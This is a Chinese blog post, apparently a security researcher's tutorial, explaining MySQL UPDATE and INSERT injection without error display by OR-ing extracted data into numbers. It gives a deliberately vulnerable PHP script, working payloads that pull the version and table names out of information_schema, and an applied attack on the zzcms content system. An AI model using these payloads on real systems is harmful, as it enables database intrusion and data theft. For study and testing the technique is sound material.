mysql注入 显错模式 不显 错误_当update注入遇到关闭显错

最新推荐文章于 2023-07-27 13:19:01 发布
最新推荐文章于 2023-07-27 13:19:01 发布
阅读量124 收藏
点赞数
文章标签: mysql注入 显错模式 不显 错误
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34784025/article/details/113954029
版权

整理自己的文件,发现很早之前写的一篇文章,还是放出来。

说明

关于update注入,可能大家最先想到的是报错注入,但是报错注入的前提是开启了错误显示。那如果关闭了报错显示呢?在Update的注入中如果关闭了显错该怎么办这篇文章中提出了一种在关闭报错情况下的注入场景,本篇文章就是对这种原理进行分析,并就一个实际的cms系统进行实际的分析。

mysql的特性

在mysql中,字符串和数组进行或运算时,将得到数字。但是需要注意的是,这个特性需要在MySQL的非严格模式下才可以使用。如下:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15mysql> select 'abc'|123;

+-----------+

| 'abc'|123 |

+-----------+

| 123 |

+-----------+

1 row in set, 1 warning (0.00 sec)

mysql> select user()|123;

+------------+

| user()|123 |

+------------+

| 123 |

+------------+

1 row in set (0.00 sec)

利用这种特性,在关闭了报错的情况下就能够将我们查询到的数据转换为十进制的数,然后与字符串进行或运算,得到的结果就是十进制的数,最终转换为对应的字符串即可。

update注入示例

存在如下代码:

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23$mysqli = new mysqli("localhost","root","root","security");

if($mysqli->connect_errno) {

printf("Connect failed: %s\n",$mysqli->connect_errno);

exit();

}

$mysqli->query("set names utf8");

$id = @$_GET['id'];

$username = @$_GET['username'];

$sql1 = "update users set username='$username' where id='$id'";

var_dump($sql1);

$sql2 = "select * from users where id='$id'";

var_dump($sql2);

$result = $mysqli->query($sql1);

if($result = $mysqli->query($sql2)) {

$row = $result->fetch_array(MYSQLI_ASSOC);

echo "ID=".$id.'的用户名变为'.$row['username'];

$result->close();

} else {

var_dump($mysqli->error);

}

$mysqli->close();

输入一个正常的用户名和ID:

77b63728df43bb4db1b4d43d6eb900be.png

利用mysql的字符和数字进行或运算的特性,如下:

241179b884e5a254f3e142a4de172e6f.png

得到了数字123456

那么接下来就是注入的过程,我们将需要查询的数据转换为数字,转换的方法就是采用转换为十六进制的方法。访问test.php?id=1&username=tom'|conv(hex(version()),16,10)|'

367aaa7a9c04eb9b887af519c61d9294.png

得到这个数据之后接下来就是进行解码,解码的方式使用unhex()即可。如下:

1

2

3

4

5

6

7mysql> select unhex(conv(58472576988467,10,16));

+-----------------------------------+

| unhex(conv(58472576988467,10,16)) |

+-----------------------------------+

| 5.5.53 |

+-----------------------------------+

1 row in set (0.00 sec)

在实际过程中会出现或操作的结果会超过mysql的数字范围导致解码得到的结果不全,是因为将字符串转为十进制之后数值较大超过了mysql的取值范围,比如user()的字符串就存在这样的问题。遇到这种情况就可以使用substr()进行分割。如下:

1

2

3# 第一次请求得到1到5之间的字符串,

http://localhost/test/test.php?id=1&username=ppp'| conv(hex(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,5)),16,10)|'

# 结果: 435626797420

解码得到:

1

2

3

4

5

6

7mysql> select unhex(conv(435626797420,10,16));

+---------------------------------+

| unhex(conv(435626797420,10,16)) |

+---------------------------------+

| email |

+---------------------------------+

1 row in set (0.00 sec)

1

2

3# 第一次请求得到5到10之间的字符串,

http://localhost/test/test.php?id=1&username=ppp'| conv(hex(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,10)),16,10)|'

# 结果: 27763

解码得到:

1

2

3

4

5

6

7mysql> select unhex(conv(27763,10,16));

+--------------------------+

| unhex(conv(27763,10,16)) |

+--------------------------+

| ls |

+--------------------------+

1 row in set (0.00 sec)

将两次的数据进行组合,得到表名为emails

zzcms中的update注入

如果说上面的只是纸上谈兵,那么来看一个实际的例子。 在user/msg.php中的代码如下:

1

2

3

4

5

6

7

8

9

10

11if ($action == "savedata") {

$saveas = trim($_REQUEST["saveas"]);

$content = stripfxg(rtrim($_POST["info_content"]));

if ($saveas == "add") {

query("insert into zzcms_msg (content)VALUES('$content') ");

$go = 1;

} elseif ($saveas == "modify") {

query("update zzcms_msg set content='$content' where id=" . $_POST['id'] . " ");

$go = 1;

}

}

对于POST参数content使用stripfxg()方法。stripfxg()的代码如下:

1

2

3

4

5function stripfxg($string){//去反斜杠

$string = stripslashes($string);//去反斜杠,不开get_magic_quotes_gpc 的情况下,在stopsqlin中都加上了,这里要去了

$string = htmlspecialchars_decode($string);//转html实体符号

return $string;

}

去掉了反斜线和转html实体编号,那么就可以进行SQL注入。 在user/msg.php提交如下:

1

2URL: http://localhost/user/msg.php?action=savedata&saveas=modify

POST: info_content=ppp'|conv(hex(version()),16,10)|'&id=1

修改之后,可以在msg_manage.php进行查询。之后访问user/msg_manage.php,得到插入的结果,还原成原来的字符串即可。

实际演示

26234c0c414bf93940462042e17c6f75.png

得到的结果就是58472576988467就是版本号,解码之后就可以得到字符串结果。

1

2

3

4

5

6

7mysql> select unhex(conv(58472576988467,10,16));

+-----------------------------------+

| unhex(conv(58472576988467,10,16)) |

+-----------------------------------+

| 5.5.53 |

+-----------------------------------+

1 row in set (0.00 sec)

其实这道题目除了通过updat注入之外,通过insert的方式也可以达到相同的目的。只需要访问:

1

2URL: http://localhost/user/msg.php?action=savedata&saveas=add

POST: info_content=ppp'|conv(hex(version()),16,10)|'

原理和update注入的原理是一样的,这里就不作说明了。

其他-1

上面是使用或操作,那么能否使用与操作呢?答案是不行的。进行如下的尝试:

1

2

3

4

5

6

7mysql> select 'abc'&123;

+-----------+

| 'abc'&123 |

+-----------+

| 0 |

+-----------+

1 row in set, 1 warning (0.00 sec)

因为字符串与数字进行或操作的时候得到的都是空,无法通过返回值得到有价值的结果。 问题就来了,为什么或操作和与操作之间的结果会存在差异呢?这个问题我之前已经研究过了,主要是进行或操作和与操作时进行的是二进制的运算,对于字符串首先会转换为数字,此时都是0。0和任何数字与操作都是0。具体的分析可以去看当order by遇上|

其他-2

虽然整篇文章是通过update的方式进行讲解的,但是通过最后的实例也可以发现,其实在insert语句的情况下也能够达到相同的目的。其实不管是update还是insert,都是需要在数据库中插入数据,之后查询得到插入的结果。

总结这种方式需要update语句配合select查询才能够使用,而且需要在MySQL的非严格模式下才可以使用。

这篇文章仅仅只是提供了update在一种场景下的注入方式,但是还是存在一定的局限性,很多时候select、()、,都会被过滤掉。

这篇文章只是提出了一种注入场景,作为一个安全研究人员应该具备举一反三的能力,而不是局限在这个场景里面。

格莫拉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
初学Web安全之sql注入(二)——报错注入
weixin_47531846的博客
11-20 687
知识补充: 前一篇提到了如何判断字符型与数字型以及字符型的闭合,不过在做sqli-labs靶场时,出现了id=(‘1’),甚至还有id=((‘1’))这样双括号包裹的,在这里笔者也是没想到,不过正常来说,开发人员是不会使用这种的,所以前篇提到的单引号双引号判断法,还是有用的。 其实页面有回,判断出数字型以及字符型还有闭合,还是相对简单的,下面拿靶场举列 上图,我们将报错信息拿出来分析一下: ''1'' LIMIT 0,1' 将最外面的包裹引号去掉: '1'' LIMIT 0, 不难看出,我们输
sa权限(MSSQL注入SA权限不显错模式下的入侵)
Coisini的博客
05-27 2157
内容:MSSQL注入SA权限不显错模式下的入侵 一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。 我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。 这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和...
报错注入示不全问题
矜庄寂寥的博客
12-18 3898
目录介绍实验环境解决方法0x010x02 方法一(利用limit子句)0x02 方法二(使用mid函数)0x03 方法三(sqlmap O(∩_∩)O) 介绍 在sql主任中使用 updatexml extractvalue exp floor函数进行报错注入时,有时会出现由于数据的数量过多导致无法一次性示所有内容,所以鄙人就去寻找了几种解决方法 实验环境 本次实验使用的是github上开源的sqli-labs训练靶场 地址:https://github.com/Audi-1/sqli-labs 解决
关于SQL报错注入数据输出示不完全的问题
m0_63138919的博客
07-27 1077
本文是对于sql报错注入 数据结果示不全问题的解决方案 欢迎大家进行补充
CTFHub笔记之技能树-web:报错注入
weixin_48799157的博客
03-19 391
小白一个,如有错误请指正! 对这方面不是很熟悉,补了一下知识点: https://blog.csdn.net/silence1_/article/details/90812612https://blog.csdn.net/silence1_/article/details/90812612 解法一: 1.用extractvalue()函数爆数据库 select * from news where id=1 and (select extractvalue(1,concat(0x7e,(select
SQL报错注入的12个函数及sql注入语句
weixin_30852451的博客
07-09 1254
转来的 侵删 1、通过floor报错,注入语句如下: andselect1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a); 2、通过ExtractValue报错,注入语句如下: andextractva...
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们...
php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击
10-20
主要介绍了php mysql_real_escape_string addslashes及mysql绑定参数防SQL注入攻击的相关资料,需要的朋友可以参考下
MySQL注入攻击与防御
02-25
like,mod(),...)字符串的猜解操作(mid(),left(),rpad(),…)字符串生成操作(0x61,hex(),conv()(使用conv([10-36],10,36)可以实现所有字符的表示))可以用以下语句对一个可能的注入点进行测试以下是Mysql中可以用到的...
PHP+MYSQL 注入靶场
最新发布
04-26
SQL注入通常针对的是数据库的查询操作,因此了解MySQL的语法和特性对于识别和利用潜在的注入点至关重要。例如,了解如何使用`UNION SELECT`、`LIKE`、`OR`等操作符构造恶意查询,或者如何通过`LIMIT`和`ORDER BY`来...
MySQL 及 SQL 注入
12-16
MySQL 及 SQL 注入 如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是...
mysql注入 显错模式 不显 错误_SQL注入mysql显错注入
weixin_32441957的博客
02-08 184
SQL注入mysql显错注入发布时间:2020-05-27 20:20:35来源:51CTO阅读:7235作者:eth10在我们实际***中,明明发现一个注入点,本以为丢给sqlmap就可以了,结果sqlmap只示确实是注入点,但是数据库却获取不了,如图1所示,这时我们可以使用手工进行注入,判断出过滤规则以及基本过滤情况,然后再选择对应的sqlmap脚本(如果有的话),本文主要是讲述如何通过m...
SQL报错注入小结
热门推荐
lixiangminghate的专栏
05-13 1万+
sqli-labs的前4个实验(Lab1-Lab4)是基于SQL报错注入(Error-based injection)。什么是SQL报错注入?这是一种页面响应形式。响应过程如下:当用户在前台页面上输入检索内容时,后台将前台页面上输入的检索内容无加区别的拼接成sql语句,送给数据库执行。数据库将执行结果返回给后台。后台将数据库执行结果无加区别的示到前台页面上。上面这句话中,我用了2个"无加区别"-...
SQL注入之报错注入
帅醉了的博客
03-03 1201
0x00_报错注入原理 构造报错payload让信息通过报错信息回出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
sql报错注入总结【积累中】
Sp4rkW的博客
10-05 3509
==========================第一次总结尝试============================== 首先放一下测试的表 第一条报错注入语句: select password from sql_test where username = 'admin' and (select 1 from (select count(*),concat(version(...
Oracle注入——报错注入
weixin_46601374的博客
02-28 1410
1、什么是Oracle数据库? Oracle 数据库系统,是美国ORACLE公司(甲骨文)提供的以分布式数据库为核心的一组软件产品。Oracle数据库也是一种关系数据库,此数据库体量较大,一般与jsp网站联合 2、Oracle 系统表 Oracle中内置了大量的系统表(有点类似MySQL中的information_schema数据库),根据不同的权限可读取不同的系统表。可通过读取这些系统表获取我们想要的数据(用户信息、表、字段、数据库信息等) DBA、ALL、USER、V_$、GV_$、SESS
linux 实现非阻塞connect
Turbyun的博客
06-15 504
Linux 怎样实现非阻塞connect 前言 凡是接触过socket编程的,对connect函数一定不陌生。因为socket是面向连接的,所以在进行读写操作前我们首先要进行连接,而所谓连接也就是我们常说的三次握手,这个过程就是在connect函数中完成的。 虽然connect函数本身不具备阻塞的功能,但是我们可以通过对socket进行设置和使用select函数可以设置阻塞时间的特性实现非...
SQL注入显错注入(一)
Mr.Huang_的博客
08-10 299
SQL注入的原理解析 sql注入是指web应用程序对用户输入数据的合法性没有判断,导致攻击者可以构造不同的sql语句来实现对数据库的操作。 SQL注入本质 谈到SQL注入前我们先谈谈什么是注入 注入攻击的本质,是把用户输入的数据当做代码执行。 SQL注入的本质 用户输入的数据当做SQL代码执行 SQL注入的条件,这里有两个关键条件 第一个是用户能够控制输入 第二个是原本程序要执行的代码,拼接了用户输入的数据然后进行执行 MySQL系统自带库 MySQL 中存储所有数据库名、所有表名、所有字段名
SQL Injection with MySQL 注入分析
09-14
SQL Injection with MySQL 注入分析是一篇由作者angel原创的IT技术文章,主要针对国内相对较少见的php+MySQL编程环境下的SQL注入问题进行深入探讨。随着Web应用程序的发展,SQL注入已经成为一种常见的安全漏洞,尤其...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值